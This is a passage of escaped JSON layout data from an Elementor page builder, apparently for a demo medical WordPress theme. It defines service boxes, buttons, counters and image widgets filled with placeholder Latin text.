More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"756a496\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e898dc3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"iulpcd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"m7heks5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Reserve now in our hospital\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"zq38c4y\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"9kdvz1o\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"y3vt4zr\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8088599\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1fhtv2k\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fnui4s\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_563214.jpg\",\"id\":144},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"hlxu9mu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Transplant Services\",\"description_text\":\"Nulla metus metus ullamcorper vel tincidunt sed, euismod in ouisque volutpat litora torquent\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"k5ey6e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"vpd68pg\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"sp1hkvu\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_957412.jpg\",\"id\":145},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"tfbwu8m\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Sed lectus. Integer euismod lacus luctus magna. Quisque cursus, metus vitae sem massa mattis\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"wiytuem\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"skqiyik\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fv7id0y\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_369542.jpg\",\"id\":143},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"104\",\"height\":\"104\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0,0,0,0.2)\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1fkclio\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"title_text\":\"Dental Clinic\",\"description_text\":\"Ullamcorper. Nulla facilisi. Integer lacinia sollicitudin massa. Cras metus. Sed aliquet risus a id tortor\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"mtrt6oy\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read More\",\"align\":\"center\",\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0.4},\"button_text_color\":\"#333333\",\"background_color\":\"rgba(0,0,0,0)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xm3kst6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Register Now\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"background_color\":\"#01aef0\",\"hover_color\":\"#01aef0\",\"button_background_hover_color\":\"rgba(0,0,0,0)\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"30\",\"bottom\":\"10\",\"left\":\"30\",\"isLinked\":false},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"960wyxr\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8dbf01c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"8231wcp\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8k6776\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":142,\"title\":\"saved hearts\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"ktjw2tm\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"gffdt05\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":6424,\"suffix\":\"+\",\"title\":\"happy patients\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"k1ny1cq\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"jegms49\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":1382,\"suffix\":\"+\",\"title\":\"doctors number\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false},{\"id\":\"mjm18s4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"wsyu9mt\",\"elType\":\"widget\",\"settings\":{\"starting_number\":\"\",\"ending_number\":275,\"title\":\"saved lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center 